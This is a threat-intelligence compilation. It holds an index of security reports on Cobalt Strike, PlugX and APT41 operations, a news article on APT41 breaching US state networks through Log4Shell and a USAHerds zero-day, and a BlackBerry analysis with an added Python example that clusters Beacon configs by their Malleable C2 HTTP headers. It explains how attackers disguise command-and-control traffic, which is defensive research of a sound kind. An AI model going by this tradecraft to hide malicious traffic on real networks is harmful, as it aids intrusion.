⋅
SecureWorksThreat Profile: GOLD DRAKE Cobalt Strike
Dridex
FriedEx
Koadic
MimiKatz
WastedLocker
Evil Corp
×Select Content2021-01-01
⋅
Talos
⋅
Talos Incident ResponseCobalt Strikes Out Cobalt Strike
×Select Content2020-12-26
⋅
Medium grimminck
⋅
Stefan GrimminckSpoofing JARM signatures. I am the Cobalt Strike server now! Cobalt Strike
×Select Content2020-12-26
⋅
CYBER GEEKS All Things Infosec
⋅
CyberMasterVAnalyzing APT19 malware using a step-by-step method Derusbi
×Select Content2020-12-24
⋅
IronNet
⋅
Adam HlavekChina cyber attacks: the current threat landscape PLEAD
TSCookie
FlowCloud
Lookback
PLEAD
PlugX
Quasar RAT
Winnti
×Select Content2020-12-22
⋅
TRUESEC
⋅
Mattias WåhlénCollaboration between FIN7 and the RYUK group, a Truesec Investigation Carbanak
Cobalt Strike
Ryuk
×Select Content2020-12-21
⋅
Fortinet
⋅
Udi YavoWhat We Have Learned So Far about the “Sunburst”/SolarWinds Hack Cobalt Strike
SUNBURST
TEARDROP
×Select Content2020-12-20
⋅
Randhome
⋅
Etienne MaynierAnalyzing Cobalt Strike for Fun and Profit Cobalt Strike
×Select Content2020-12-15
⋅
Github (sophos-cybersecurity)
⋅
Sophos Cyber Security Teamsolarwinds-threathunt Cobalt Strike
SUNBURST
×Select Content2020-12-15
⋅
PICUS Security
⋅
Süleyman ÖzarslanTactics, Techniques, and Procedures (TTPs) Used in the SolarWinds Breach Cobalt Strike
SUNBURST
×Select Content2020-12-14
⋅
Palo Alto Networks Unit 42
⋅
Unit 42Threat Brief: SolarStorm and SUNBURST Customer Coverage Cobalt Strike
SUNBURST
×Select Content2020-12-11
⋅
Blackberry
⋅
BlackBerry Research and Intelligence teamMountLocker Ransomware-as-a-Service Offers Double Extortion Capabilities to Affiliates Cobalt Strike
Mount Locker
×Select Content2020-12-10
⋅
ESET Research
⋅
Mathieu TartareOperation StealthyTrident: corporate software under attack HyperBro
PlugX
Tmanger
TA428
×Select Content2020-12-10
⋅
ESET Research
⋅
Mathieu TartareOperation StealthyTrident: corporate software under attack HyperBro
PlugX
ShadowPad
Tmanger
×Select Content2020-12-10
⋅
Palo Alto Networks Unit 42
⋅
Unit42Threat Brief: FireEye Red Team Tool Breach Cobalt Strike
×Select Content2020-12-10
⋅
Intel 471
⋅
Intel 471No pandas, just people: The current state of China’s cybercrime underground Anubis
SpyNote
AsyncRAT
Cobalt Strike
Ghost RAT
NjRAT
×Select Content2020-12-09
⋅
InfoSec Handlers Diary Blog
⋅
Brad DuncanRecent Qakbot (Qbot) activity Cobalt Strike
QakBot
×Select Content2020-12-09
⋅
Avast Decoded
⋅
Igor Morgenstern,
Luigino CamastraAPT Group Targeting Governmental Agencies in East Asia Albaniiutas
HyperBro
PlugX
PolPo
Tmanger
×Select Content2020-12-09
⋅
Cisco
⋅
Caitlin Huey,
David LiebenbergQuarterly Report: Incident Response trends from Fall 2020 Cobalt Strike
IcedID
Maze
RansomEXX
Ryuk
×Select Content2020-12-09
⋅
FireEye
⋅
Mitchell Clarke,
Tom HallIt's not FINished The Evolving Maturity in Ransomware Operations (SLIDES) Cobalt Strike
DoppelPaymer
QakBot
REvil
×Select Content2020-12-09
⋅
Avast Decoded
⋅
Igor Morgenstern,
Luigino CamastraAPT Group Targeting Governmental Agencies in East Asia Albaniiutas
HyperBro
PlugX
Tmanger
TA428
×Select Content2020-12-08
⋅
Cobalt Strike
⋅
Raphael MudgeA Red Teamer Plays with JARM Cobalt Strike
×Select Content2020-12-02
⋅
Red Canary
⋅
twitter (@redcanary)Tweet on increased #Qbot activity delivering Cobalt Strike & #Egregor ransomware Cobalt Strike
Egregor
QakBot
×Select Content2020-12-01
⋅
mez0.cc
⋅
mez0Cobalt Strike PowerShell Execution Cobalt Strike
×Select Content2020-12-01
⋅
360.cn
⋅
jindanlongHunting Beacons Cobalt Strike
×Select Content2020-11-30
⋅
FireEye
⋅
Mitchell Clarke,
Tom HallIt's not FINished The Evolving Maturity in Ransomware Operations Cobalt Strike
DoppelPaymer
MimiKatz
QakBot
REvil
×Select Content2020-11-30
⋅
Microsoft
⋅
Microsoft 365 Defender Threat Intelligence Team,
Microsoft Threat Intelligence Center (MSTIC)Threat actor (BISMUTH) leverages coin miner techniques to stay under the radar – here’s how to spot them Cobalt Strike
×Select Content2020-11-27
⋅
⋅
Macnica
⋅
Hiroshi TakeuchiAnalyzing Organizational Invasion Ransom Incidents Using Dtrack Cobalt Strike
Dtrack
×Select Content2020-11-27
⋅
PTSecurity
⋅
Alexey Vishnyakov,
Denis GoydenkoInvestigation with a twist: an accidental APT attack and averted data destruction TwoFace
CHINACHOPPER
HyperBro
MegaCortex
MimiKatz
×Select Content2020-11-26
⋅
Cybereason
⋅
Cybereason Nocturnus,
Lior RochbergerCybereason vs. Egregor Ransomware Cobalt Strike
Egregor
IcedID
ISFB
QakBot
×Select Content2020-11-25
⋅
SentinelOne
⋅
Jim WalterEgregor RaaS Continues the Chaos with Cobalt Strike and Rclone Cobalt Strike
Egregor
×Select Content2020-11-23
⋅
Proofpoint
⋅
Proofpoint Threat Research TeamTA416 Goes to Ground and Returns with a Golang PlugX Malware Loader PlugX
MUSTANG PANDA
×Select Content2020-11-23
⋅
Youtube (OWASP DevSlop)
⋅
Negar Shabab,
Noushin ShababCompromised Compilers - A new perspective of supply chain cyber attacks ShadowPad
×Select Content2020-11-20
⋅
ZDNet
⋅
Catalin CimpanuThe malware that usually installs ransomware and you need to remove right away Avaddon
BazarBackdoor
Buer
Clop
Cobalt Strike
Conti
DoppelPaymer
Dridex
Egregor
Emotet
FriedEx
MegaCortex
Phorpiex
PwndLocker
QakBot
Ryuk
SDBbot
TrickBot
Zloader
×Select Content2020-11-20
⋅
F-Secure Labs
⋅
Riccardo AncaraniDetecting Cobalt Strike Default Modules via Named Pipe Analysis Cobalt Strike
×Select Content2020-11-20
⋅
Trend Micro
⋅
Abraham Camba,
Bren Matthew Ebriega,
Gilbert SisonWeaponizing Open Source Software for Targeted Attacks LaZagne
Defray
PlugX
×Select Content2020-11-20
⋅
⋅
360 netlab
⋅
JiaYuBlackrota, a highly obfuscated backdoor developed by Go Cobalt Strike
×Select Content2020-11-17
⋅
Salesforce Engineering
⋅
John AlthouseEasily Identify Malicious Servers on the Internet with JARM Cobalt Strike
TrickBot
×Select Content2020-11-17
⋅
cyble
⋅
CybleOceanLotus Continues With Its Cyber Espionage Operations Cobalt Strike
Meterpreter
×Select Content2020-11-15
⋅
Trustnet
⋅
Michael WainshtainFrom virus alert to PowerShell Encrypted Loader Cobalt Strike
×Select Content2020-11-13
⋅
Youtube (The Standoff)
⋅
Alexey Zakharov,
Positive TechnologiesFF_202_Eng - From old Higaisa samples to new Winnti backdoors: The story of one research CROSSWALK
Unidentified 076 (Higaisa LNK to Shellcode)
×Select Content2020-11-09
⋅
Bleeping Computer
⋅
Ionut IlascuFake Microsoft Teams updates lead to Cobalt Strike deployment Cobalt Strike
DoppelPaymer
NjRAT
Predator The Thief
Zloader
×Select Content2020-11-06
⋅
Cobalt Strike
⋅
Raphael MudgeCobalt Strike 4.2 – Everything but the kitchen sink Cobalt Strike
×Select Content2020-11-06
⋅
Palo Alto Networks Unit 42
⋅
CRYPSIS,
Drew Schmitt,
Ryan TraceyIndicators of Compromise related to Cobaltstrike, PyXie Lite, Vatet and Defray777 Cobalt Strike
PyXie
RansomEXX
×Select Content2020-11-06
⋅
Advanced Intelligence
⋅
Vitali KremezAnatomy of Attack: Inside BazarBackdoor to Ryuk Ransomware "one" Group via Cobalt Strike BazarBackdoor
Cobalt Strike
Ryuk
×Select Content2020-11-06
⋅
Volexity
⋅
Steven Adair,
Thomas Lancaster,
Volexity Threat ResearchOceanLotus: Extending Cyber Espionage Operations Through Fake Websites Cobalt Strike
KerrDown
APT32
×Select Content2020-11-05
⋅
Twitter (@ffforward)
⋅
TheAnalystTweet on Zloader infection leads to Cobaltstrike Installation and deployment of RYUK Cobalt Strike
Ryuk
Zloader
×Select Content2020-11-05
⋅
The DFIR Report
⋅
The DFIR ReportRyuk Speed Run, 2 Hours to Ransom BazarBackdoor
Cobalt Strike
Ryuk
×Select Content2020-11-04
⋅
Sophos
⋅
Gabor SzappanosA new APT uses DLL side-loads to “KilllSomeOne” KilllSomeOne
PlugX
×Select Content2020-11-04
⋅
VMRay
⋅
Giovanni VignaTrick or Threat: Ryuk ransomware targets the health care industry BazarBackdoor
Cobalt Strike
Ryuk
TrickBot
×Select Content2020-11-03
⋅
InfoSec Handlers Diary Blog
⋅
Renato MarinhoAttackers Exploiting WebLogic Servers via CVE-2020-14882 to install Cobalt Strike Cobalt Strike
×Select Content2020-11-03
⋅
Kaspersky Labs
⋅
GReATAPT trends report Q3 2020 WellMail
EVILNUM
Janicab
Poet RAT
AsyncRAT
Ave Maria
Cobalt Strike
Crimson RAT
CROSSWALK
Dtrack
LODEINFO
MoriAgent
Okrum
PlugX
poisonplug
Rover
ShadowPad
SoreFang
Winnti
×Select Content2020-10-30
⋅
Github (ThreatConnect-Inc)
⋅
ThreatConnectUNC 1878 Indicators from Threatconnect BazarBackdoor
Cobalt Strike
Ryuk
×Select Content2020-10-29
⋅
RiskIQ
⋅
RiskIQRyuk Ransomware: Extensive Attack Infrastructure Revealed Cobalt Strike
Ryuk
×Select Content2020-10-29
⋅
Red Canary
⋅
The Red Canary TeamA Bazar start: How one hospital thwarted a Ryuk ransomware outbreak Cobalt Strike
Ryuk
TrickBot
×Select Content2020-10-29
⋅
Github (Swisscom)
⋅
Swisscom CSIRTList of CobaltStrike C2's used by RYUK Cobalt Strike
×Select Content2020-10-28
⋅
FireEye
⋅
Douglas Bienstock,
Jeremy Kennelly,
Joshua Shilko,
Kimberly Goody,
Steve ElovitzUnhappy Hour Special: KEGTAP and SINGLEMALT With a Ransomware Chaser BazarBackdoor
Cobalt Strike
Ryuk
UNC1878
×Select Content2020-10-27
⋅
Sophos Managed Threat Response (MTR)
⋅
Greg IddonMTR Casebook: An active adversary caught in the act Cobalt Strike
×Select Content2020-10-27
⋅
Dr.Web
⋅
Dr.WebStudy of the ShadowPad APT backdoor and its relation to PlugX Ghost RAT
PlugX
ShadowPad
×Select Content2020-10-18
⋅
The DFIR Report
⋅
The DFIR ReportRyuk in 5 Hours BazarBackdoor
Cobalt Strike
Ryuk
×Select Content2020-10-14
⋅
RiskIQ
⋅
Jon Gross,
Steve GintyA Well-Marked Trail: Journeying through OceanLotus's Infrastructure Cobalt Strike
×Select Content2020-10-14
⋅
Sophos
⋅
Sean GallagherThey’re back: inside a new Ryuk ransomware attack Cobalt Strike
Ryuk
SystemBC
×Select Content2020-10-12
⋅
Malwarebytes Labs
⋅
Hossein Jazi,
Jérôme Segura,
Malwarebytes Threat Intelligence Team,
Roberto SantosWinnti APT group docks in Sri Lanka for new campaign DBoxAgent
SerialVlogger
Winnti
×Select Content2020-10-12
⋅
Advanced Intelligence
⋅
Roman Marshanski,
Vitali Kremez"Front Door" into BazarBackdoor: Stealthy Cybercrime Weapon BazarBackdoor
Cobalt Strike
Ryuk
×Select Content2020-10-11
⋅
Github (StrangerealIntel)
⋅
StrangerealIntelChimera, APT19 under the radar ? Cobalt Strike
Meterpreter
×Select Content2020-10-08
⋅
Bayerischer Rundfunk
⋅
Ann-Kathrin Wetter,
Hakan Tanriverdi,
Kai Biermann,
Max Zierer,
Thi Do NguyenThere is no safe place Cobalt Strike
×Select Content2020-10-08
⋅
The DFIR Report
⋅
The DFIR ReportRyuk’s Return BazarBackdoor
Cobalt Strike
Ryuk
×Select Content2020-10-02
⋅
Health Sector Cybersecurity Coordination Center (HC3)
⋅
Health Sector Cybersecurity Coordination Center (HC3)Report 202010021600: Recent Bazarloader Use in Ransomware Campaigns BazarBackdoor
Cobalt Strike
Ryuk
TrickBot
×Select Content2020-10-01
⋅
Wired
⋅
Andy GreenbergRussia’s Fancy Bear Hackers Likely Penetrated a US Federal Agency Cobalt Strike
Meterpreter
×Select Content2020-10-01
⋅
US-CERT
⋅
US-CERTAlert (AA20-275A): Potential for China Cyber Response to Heightened U.S.-China Tensions CHINACHOPPER
Cobalt Strike
Empire Downloader
MimiKatz
Poison Ivy
×Select Content2020-09-29
⋅
Github (Apr4h)
⋅
ApraCobaltStrikeScan Cobalt Strike
×Select Content2020-09-29
⋅
CrowdStrike
⋅
Kareem Hamdan,
Lucas MillerGetting the Bacon from the Beacon Cobalt Strike
×Select Content2020-09-24
⋅
US-CERT
⋅
US-CERTAnalysis Report (AR20-268A): Federal Agency Compromised by Malicious Cyber Actor Cobalt Strike
Meterpreter
×Select Content2020-09-21
⋅
Cisco Talos
⋅
Joe Marshall,
JON MUNSHAW,
Nick MavisThe art and science of detecting Cobalt Strike Cobalt Strike
×Select Content2020-09-18
⋅
Symantec
⋅
Threat Hunter TeamAPT41: Indictments Put Chinese Espionage Group in the Spotlight CROSSWALK
PlugX
poisonplug
ShadowPad
Winnti
×Select Content2020-09-18
⋅
Trend Micro
⋅
Trend MicroU.S. Justice Department Charges APT41 Hackers over Global Cyberattacks Cobalt Strike
ColdLock
×Select Content2020-09-16
⋅
FBI
⋅
FBIFBI Flash AC-000133-TT: Indictment of China-Based Cyber Actors Associated with APT 41for Intrusion Activities APT41
×Select Content2020-09-16
⋅
Department of Justice
⋅
Department of JusticeSeven International Cyber Defendants, Including “Apt41” Actors, Charged In Connection With Computer Intrusion Campaigns Against More Than 100 Victims Globally APT41
RedGolf
×Select Content2020-09-15
⋅
US-CERT
⋅
US-CERTAlert (AA20-259A): Iran-Based Threat Actor Exploits VPN Vulnerabilities CHINACHOPPER
Fox Kitten
×Select Content2020-09-15
⋅
Recorded Future
⋅
Insikt Group®Back Despite Disruption: RedDelta Resumes Operations PlugX
×Select Content2020-09-15
⋅
US-CERT
⋅
US-CERTMalware Analysis Report (AR20-259A): Iranian Web Shells CHINACHOPPER
×Select Content2020-09-11
⋅
ThreatConnect
⋅
ThreatConnect Research TeamResearch Roundup: Activity on Previously Identified APT33 Domains Emotet
PlugX
APT33
×Select Content2020-09-10
⋅
Kaspersky Labs
⋅
GReATAn overview of targeted attacks and APTs on Linux Cloud Snooper
Dacls
DoubleFantasy
MESSAGETAP
Penquin Turla
Tsunami
elf.wellmess
X-Agent
×Select Content2020-09-08
⋅
PTSecurity
⋅
PTSecurityShadowPad: new activity from the Winnti group CCleaner Backdoor
Korlia
ShadowPad
TypeHash
×Select Content2020-09-03
⋅
⋅
Viettel Cybersecurity
⋅
vuonglvmAPT32 deobfuscation arsenal: Deobfuscating một vài loại Obfucation Toolkit của APT32 (Phần 2) Cobalt Strike
×Select Content2020-09-01
⋅
Cisco Talos
⋅
Caitlin Huey,
David LiebenbergQuarterly Report: Incident Response trends in Summer 2020 Cobalt Strike
LockBit
Mailto
Maze
Ryuk
×Select Content2020-08-31
⋅
The DFIR Report
⋅
The DFIR ReportNetWalker Ransomware in 1 Hour Cobalt Strike
Mailto
MimiKatz
×Select Content2020-08-20
⋅
⋅
Seebug Paper
⋅
MalaykeUse ZoomEye to track multiple Redteam C&C post-penetration attack frameworks Cobalt Strike
Empire Downloader
PoshC2
×Select Content2020-08-19
⋅
⋅
TEAMT5
⋅
TeamT5調查局 08/19 公布中國對台灣政府機關駭侵事件說明 Cobalt Strike
Waterbear
×Select Content2020-08-14
⋅
Twitter (@VK_intel)
⋅
Vitali KremezTweet on Zloader infection leading to Cobaltstrike Installation Cobalt Strike
Zloader
×Select Content2020-08-06
⋅
Wired
⋅
Andy GreenbergChinese Hackers Have Pillaged Taiwan's Semiconductor Industry Cobalt Strike
MimiKatz
Winnti
Red Charon
×Select Content2020-08-04
⋅
BlackHat
⋅
Chung-Kuan Chen,
Inndy Lin,
Shang-De JiangOperation Chimera - APT Operation Targets Semiconductor Vendors Cobalt Strike
MimiKatz
Winnti
Red Charon
×Select Content2020-07-29
⋅
Recorded Future
⋅
Insikt GroupChinese State-sponsored Group RedDelta Targets the Vatican and Catholic Organizations PlugX
×Select Content2020-07-29
⋅
ESET Research
⋅
welivesecurityTHREAT REPORT Q2 2020 DEFENSOR ID
HiddenAd
Bundlore
Pirrit
Agent.BTZ
Cerber
ClipBanker
CROSSWALK
Cryptowall
CTB Locker
DanaBot
Dharma
Formbook
Gandcrab
Grandoreiro
Houdini
ISFB
LockBit
Locky
Mailto
Maze
Microcin
Nemty
NjRAT
Phobos
PlugX
Pony
REvil
Socelars
STOP
Tinba
TrickBot
WannaCryptor
×Select Content2020-07-29
⋅
Kaspersky Labs
⋅
GReATAPT trends report Q2 2020 PhantomLance
Dacls
Penquin Turla
elf.wellmess
AppleJeus
Dacls
AcidBox
Cobalt Strike
Dacls
EternalPetya
Godlike12
Olympic Destroyer
PlugX
shadowhammer
ShadowPad
Sinowal
VHD Ransomware
Volgmer
WellMess
X-Agent
XTunnel
×Select Content2020-07-28
⋅
⋅
NTT
⋅
NTT SecurityCraftyPanda 標的型攻撃解析レポート Ghost RAT
PlugX
×Select Content2020-07-26
⋅
Shells.System blog
⋅
AskarIn-Memory shellcode decoding to evade AVs/EDRs Cobalt Strike
×Select Content2020-07-22
⋅
On the Hunt
⋅
Newton PaulAnalysing Fileless Malware: Cobalt Strike Beacon Cobalt Strike
×Select Content2020-07-21
⋅
YouTube ( OPCDE with Matt Suiche)
⋅
Mohamad MokbelvOPCDE #9 - A Journey into Malware HTTP Communication Channels Spectacles (Mohamad Mokbel) Alureon
Aytoke
Cobra Carbon System
CROSSWALK
danbot
ProtonBot
Silence
×Select Content2020-07-21
⋅
Department of Justice
⋅
Department of JusticeTwo Chinese Hackers Working with the Ministry of State Security Charged with Global Computer Intrusion Campaign Targeting Intellectual Property and Confidential Business Information, Including COVID-19 Research CHINACHOPPER
BRONZE SPRING
×Select Content2020-07-21
⋅
Malwarebytes
⋅
Hossein Jazi,
Jérôme SeguraChinese APT group targets India and Hong Kong using new variant of MgBot malware KSREMOTE
Cobalt Strike
MgBot
Evasive Panda
×Select Content2020-07-20
⋅
Dr.Web
⋅
Dr.WebStudy of the APT attacks on state institutions in Kazakhstan and Kyrgyzstan Microcin
Mirage
PlugX
WhiteBird
×Select Content2020-07-20
⋅
Risky.biz
⋅
Daniel GordonWhat even is Winnti? CCleaner Backdoor
Ghost RAT
PlugX
ZXShell
×Select Content2020-07-20
⋅
or10nlabs
⋅
oR10nReverse Engineering the New Mustang Panda PlugX Downloader PlugX
×Select Content2020-07-15
⋅
ZDNet
⋅
Catalin CimpanuChinese state hackers target Hong Kong Catholic Church PlugX
×Select Content2020-07-14
⋅
CrowdStrike
⋅
Falcon OverWatch TeamManufacturing Industry in the Adversaries’ Crosshairs ShadowPad
Snake
×Select Content2020-07-07
⋅
MWLab
⋅
Ladislav BačoCobalt Strike stagers used by FIN6 Cobalt Strike
×Select Content2020-07-05
⋅
Council on Foreign Relations
⋅
Cyber Operations TrackerAPT 41 APT41
×Select Content2020-07-05
⋅
or10nlabs
⋅
oR10nReverse Engineering the Mustang Panda PlugX RAT – Extracting the Config PlugX
×Select Content2020-07-05
⋅
Council on Foreign Relations
⋅
Cyber Operations TrackerWinnti Umbrella APT41
×Select Content2020-07-01
⋅
Contextis
⋅
Lampros Noutsos,
Oliver FayDLL Search Order Hijacking Cobalt Strike
PlugX
×Select Content2020-06-25
⋅
Dr.Web
⋅
Dr.WebBackDoor.ShadowPad.1 ShadowPad
×Select Content2020-06-23
⋅
NCC Group
⋅
Michael Sandee,
Nikolaos Pantazopoulos,
Stefano AntenucciWastedLocker: A New Ransomware Variant Developed By The Evil Corp Group Cobalt Strike
ISFB
WastedLocker
×Select Content2020-06-23
⋅
Symantec
⋅
Critical Attack Discovery and Intelligence TeamSodinokibi: Ransomware Attackers also Scanning for PoS Software, Leveraging Cobalt Strike Cobalt Strike
REvil
×Select Content2020-06-22
⋅
Talos Intelligence
⋅
Asheer MalhotraIndigoDrop spreads via military-themed lures to deliver Cobalt Strike Cobalt Strike
IndigoDrop
×Select Content2020-06-22
⋅
Sentinel LABS
⋅
Jason Reaves,
Joshua PlattInside a TrickBot Cobalt Strike Attack Server Cobalt Strike
TrickBot
×Select Content2020-06-19
⋅
Zscaler
⋅
Atinderpal Singh,
Nirmal Singh,
Sahil AntilTargeted Attack Leverages India-China Border Dispute to Lure Victims Cobalt Strike
×Select Content2020-06-19
⋅
Youtube (Raphael Mudge)
⋅
Raphael MudgeBeacon Object Files - Luser Demo Cobalt Strike
×Select Content2020-06-18
⋅
Australian Cyber Security Centre
⋅
Australian Cyber Security Centre (ACSC)Advisory 2020-008: Copy-Paste Compromises –tactics, techniques and procedures used to target multiple Australian networks TwoFace
Cobalt Strike
Empire Downloader
×Select Content2020-06-17
⋅
Malwarebytes
⋅
Hossein Jazi,
Jérôme SeguraMulti-stage APT attack drops Cobalt Strike using Malleable C2 feature Cobalt Strike
×Select Content2020-06-16
⋅
Intezer
⋅
Aviygayil MechtingerELF Malware Analysis 101: Linux Threats No Longer an Afterthought Cloud Snooper
Dacls
EvilGnome
HiddenWasp
MESSAGETAP
NOTROBIN
QNAPCrypt
Winnti
×Select Content2020-06-15
⋅
NCC Group
⋅
Exploit Development GroupStriking Back at Retired Cobalt Strike: A look at a legacy vulnerability Cobalt Strike
×Select Content2020-06-09
⋅
Github (Sentinel-One)
⋅
Gal KristalCobaltStrikeParser Cobalt Strike
×Select Content2020-06-03
⋅
Kaspersky Labs
⋅
Giampaolo Dedola,
GReAT,
Mark LechtikCycldek: Bridging the (air) gap 8.t Dropper
NewCore RAT
PlugX
USBCulprit
GOBLIN PANDA
Hellsing
×Select Content2020-06-02
⋅
Lab52
⋅
Jagaimo KawaiiMustang Panda Recent Activity: Dll-Sideloading trojans with temporal C2 servers PlugX
×Select Content2020-05-24
⋅
or10nlabs
⋅
oR10nReverse Engineering the Mustang Panda PlugX Loader PlugX
×Select Content2020-05-21
⋅
ESET Research
⋅
Martin Smolár,
Mathieu TartareNo “Game over” for the Winnti Group ACEHASH
HTran
MimiKatz
PipeMon
×Select Content2020-05-15
⋅
Twitter (@stvemillertime)
⋅
Steve MillerTweet on SOGU development timeline, including TIGERPLUG IOCs PlugX
×Select Content2020-05-14
⋅
Lab52
⋅
DexThe energy reserves in the Eastern Mediterranean Sea and a malicious campaign of APT10 against Turkey Cobalt Strike
HTran
MimiKatz
PlugX
Quasar RAT
×Select Content2020-05-11
⋅
SentinelOne
⋅
Gal KristalThe Anatomy of an APT Attack and CobaltStrike Beacon’s Encoded Configuration Cobalt Strike
×Select Content2020-05-01
⋅
⋅
China-backed APT41 compromised 'at least' six US state governments | TechCrunch
China-backed APT41 compromised ‘at least’ six US state governments
Carly Page
The prolific China APT41 hacking group, known for carrying out espionage in parallel with financially motivated operations, has compromised multiple U.S. state government networks, according to cybersecurity giant Mandiant.
The group — seemingly undeterred by U.S. indictments against five APT41 members in 2020 — conducted a months-long campaign during which it targeted and successfully breached at least six U.S. state networks, all of which have been notified by Mandiant but were not named.
Between May 2021 and February 2022, the hacking group used vulnerable internet-facing web applications to gain an initial foothold into state networks. This included exploiting a zero-day vulnerability in a software application called USAHerds, used by 18 states for animal health management, and the now-infamous so-called Log4Shell vulnerability in Apache Log4j, a ubiquitous Java logging library.
Mandiant said APT41 began exploiting Log4Shell within hours of the Apache Foundation publicly sounding the alarm about the vulnerability in December 2021, which led to the compromise of two U.S. state government networks and other targets in the insurance and telecoms industries. After gaining that foothold on the network, APT41 went on to perform “extensive” credential collection.
The investigation also uncovered a variety of new techniques, evasion methods and capabilities used by APT41. In one instance, after APT41 gained access to a network via a SQL injection vulnerability in a proprietary web application — activity that was contained by Mandiant — APT41 came back two weeks later to recompromise the network with a brand new zero-day exploit. The group also tailored its malware to its victims’ environments and frequently updated the encoded data on a specific forum post, enabling the malware to receive instructions from the attackers’ command-and-control server.
Though Mandiant said it saw evidence of the hackers exfiltrating personally identifiable information that’s typically consistent with an espionage operation, the goal of the campaign remains unclear — but whatever the group is after must be of high value.
Geoff Ackerman, principal threat analyst at Mandiant, said that while the world is focused on the potential of Russian cyber threats in the wake of the invasion of Ukraine, this investigation is a reminder that other major threat actors around the world are continuing their operations as usual.
“We cannot allow other cyber activity to fall to the wayside, especially given our observations that this campaign from APT41, one of the most prolific threat actors around, continues to this day,” said Ackerman. “APT41 is truly a persistent threat, and this recent campaign is another reminder that state-level systems in the United States are under unrelenting pressure from nation-state actors like China, as well as Russia.”
Drawing a Dragon: Connecting the Dots to Find APT41
RESEARCH & INTELLIGENCE / 10.05.21 /
The BlackBerry Research & Intelligence Team
Executive Summary
The BlackBerry Research & Intelligence Team recently connected seemingly disparate malware campaigns, which began with an unusual Cobalt Strike configuration that was first included in a blog post published the same month as COVID-19 lockdowns began in Europe and the U.S. What we found led us through a malicious infrastructure that had been partially documented in articles by several other research organizations.
The image we uncovered was that of a state-sponsored campaign that plays on people’s hopes for a swift end to the pandemic as a lure to entrap its victims. And once on a user’s machine, the threat blends into the digital woodwork by using its own customized profile to hide its network traffic.
Introduction
APT41 is a prolific Chinese state-sponsored cyberthreat group that has conducted malware campaigns related to espionage and financially motivated criminal activity dating as far back as 2012. This threat group has targeted organizations around the world, in verticals such as travel, telecommunications, healthcare, news and education.
APT41 has often used phishing emails with malicious attachments as an initial infection vector. Once it has gained access to a target organization, it typically deploys more advanced malware to establish a persistent foothold. This group uses a variety of different malware families including information stealers, keyloggers and backdoors.
BlackBerry researchers have been monitoring Cobalt Strike activity that used a bespoke, malleable command-and-control (C2) profile, whose settings were previously documented in a report by FireEye in March of 2020. FireEye attributed this configuration to APT41-related activity.
We were able to uncover what we believe is additional APT41 infrastructure by taking these unique aspects and following the trail of digital breadcrumbs. Overlapping indicators of compromise (IOCs) linked the trail of our findings to those of two additional campaigns documented by Positive Technologies and Prevailion. These posts were titled "Higaisa or Winnti? APT41 backdoors, old and new," and "The Gh0st Remains the Same," respectively.
We also found three additional phishing lures targeting victims in India, containing information related to new tax legislation and COVID-19 statistics. These messages masqueraded as being from Indian government entities.
These lures were part of an execution chain that had the goal of loading and executing a Cobalt Strike Beacon on a victim’s network. The phishing lures and attachments also fit tactics that were previously used in infection vectors by APT41. These findings show that the APT41 group is still regularly conducting new campaigns, and that they will likely continue to do so in the future.
Connecting the Dots
A recent blog post published by FireEye in March of 2020 explored APT41’s tactics, including their use of malicious documents, exploits and Cobalt Strike. The report indicated that the group was using a bespoke, malleable C2 profile with at least one of its Cobalt Strike Beacons.
A malleable C2 profile is a feature within Cobalt Strike that allows an attacker to customize a Beacon’s network communications to its C2 channel in a way that allows it to blend into normal traffic on a victim network. For example, there are publicly available profiles that are designed to look like legitimate network traffic from Amazon, Gmail, OneDrive and many others.
We uncovered a malleable C2 profile on GitHub that is very similar to that of the one mentioned in the FireEye blog. This one seems to have been authored by a Chinese security researcher with the pseudonym “1135.”
These profiles had several similarities: Both used jQuery Malleable C2 profiles, and portions of the HTTP GET profile block are almost identical. HTTP header fields such as “accept,” “user-agent,” “host,” and “referer,” as well as the “set-uri” field, were all exact matches to the profile data listed in the FireEye blog.
Figure 1: JQuery Malleable C2 from the ‘1135’ Github
Armed with this data point, we can perform some deeper visual analysis of Beacon configuration data in our possession to reveal patterns that are only perceptible when a large data set is accessible. By extracting and correlating the HTTP headers used in the GET and POST requests defined in the Beacon configs, we can generate revealing connections between seemingly disparate Cobalt Strike infrastructure.
Figure 2: Clustering on "cdn.bootcss.com" HttpPost_Metadata
While we identified a relatively small number of Beacons using the BootCSS domain as part of their Malleable C2 configuration, there were also a few clusters with unique configuration metadata that enabled us to identify additional beacons related to APT41.
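The profile fingerprinting described above and the header-based clustering of Beacon configs, as an added example that is not BlackBerry's code: it parses the client-side fields of a constructed Malleable C2 profile, flattens them the way a config extractor would, and groups constructed Beacon configs that reuse the same fields. All hostnames, URIs and header values are made up except cdn.bootcss.com, which comes from the text.

```python
"""Cluster Cobalt Strike Beacon configs by their Malleable C2 HTTP metadata.
Added example, not BlackBerry's code. Profile text and Beacon configs are
constructed samples; C2 hosts use reserved .invalid names, not real indicators."""
import re
from collections import defaultdict
from itertools import combinations

SET_RE = re.compile(r'set\s+(\w+)\s+"([^"]*)";')          # set uri "/path";
HEADER_RE = re.compile(r'header\s+"([^"]+)"\s+"([^"]*)";')  # header "Host" "x";


def _block(text, name):
    """Body of the first `name { ... }` block in `text`, honouring nested braces."""
    m = re.search(r'\b' + re.escape(name) + r'\s*\{', text)
    if not m:
        return ""
    depth, start = 1, m.end()
    for i in range(start, len(text)):
        depth += {"{": 1, "}": -1}.get(text[i], 0)
        if depth == 0:
            return text[start:i]
    return text[start:]


def parse_profile(text):
    """Flatten a profile's client-side fields, e.g. 'http-get.header.host'."""
    fields = {}
    for verb in ("http-get", "http-post"):
        body = _block(text, verb)
        for key, val in SET_RE.findall(body):
            fields[f"{verb}.{key}"] = val
        for key, val in HEADER_RE.findall(_block(body, "client")):
            fields[f"{verb}.header.{key.lower()}"] = val
    return fields


def shared_fields(a, b):
    """Field names on which two configs carry identical values."""
    return {k for k in a.keys() & b.keys() if a[k] == b[k]}


def cluster(configs, min_shared=3):
    """Union-find: configs sharing at least `min_shared` fields join one cluster."""
    parent = {name: name for name in configs}

    def find(x):
        while parent[x] != x:
            parent[x] = parent[parent[x]]
            x = parent[x]
        return x

    for a, b in combinations(configs, 2):
        if len(shared_fields(configs[a], configs[b])) >= min_shared:
            parent[find(a)] = find(b)
    groups = defaultdict(list)
    for name in configs:
        groups[find(name)].append(name)
    return sorted(sorted(g) for g in groups.values())


def pivot(configs, field, value):
    """Configs whose `field` equals `value`, e.g. every Beacon using one Host header."""
    return sorted(n for n, c in configs.items() if c.get(field) == value)


def profile_matches(configs, profile, min_shared=4):
    """Configs that reuse at least `min_shared` fields of a known public profile."""
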